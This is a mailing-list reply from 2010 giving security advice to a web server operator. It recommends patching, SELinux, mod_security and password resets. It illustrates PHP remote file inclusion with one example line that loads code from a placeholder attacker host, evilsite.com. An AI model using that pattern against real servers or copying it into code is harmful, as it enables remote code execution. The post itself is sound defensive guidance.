Security Guideance

Adam Stasiniewicz adam at adamstas.com
Wed Feb 24 02:20:49 UTC 2010

I've seem similar.  Another variant of this is PHP code that lets
arbitrary data be inputted into require() or include() statements, for
example: include('http://evilsite.com/evil.txt').  That way, the attacker
can then load whatever code they want and it will never be saved to the
file system.  I would recommend verifying that all the shrink-wrapped
products (i.e. forums, blogs, CMS, etc) on the server be checked to ensure
that they at the most current update/patch and are not EOL.  Generally
most of those vendors are good at responding to security issues in their
products, but it's up to the person running the website to update their
code.

Also, have you considered enabling SELinux?  Enforcing the targeted policy
will prevent Apache from making outbound socket connections (and may break
other stuff), but it might be worth the headache. On a similar note,
mod_security also may help (depending on how the attack is being launched)
but again may break some things.

If the attack is possibly being launched via SSH/shell access, enable
password complexity then force all of your clients to change their
password.

Hope that helps,
Adam Stasiniewicz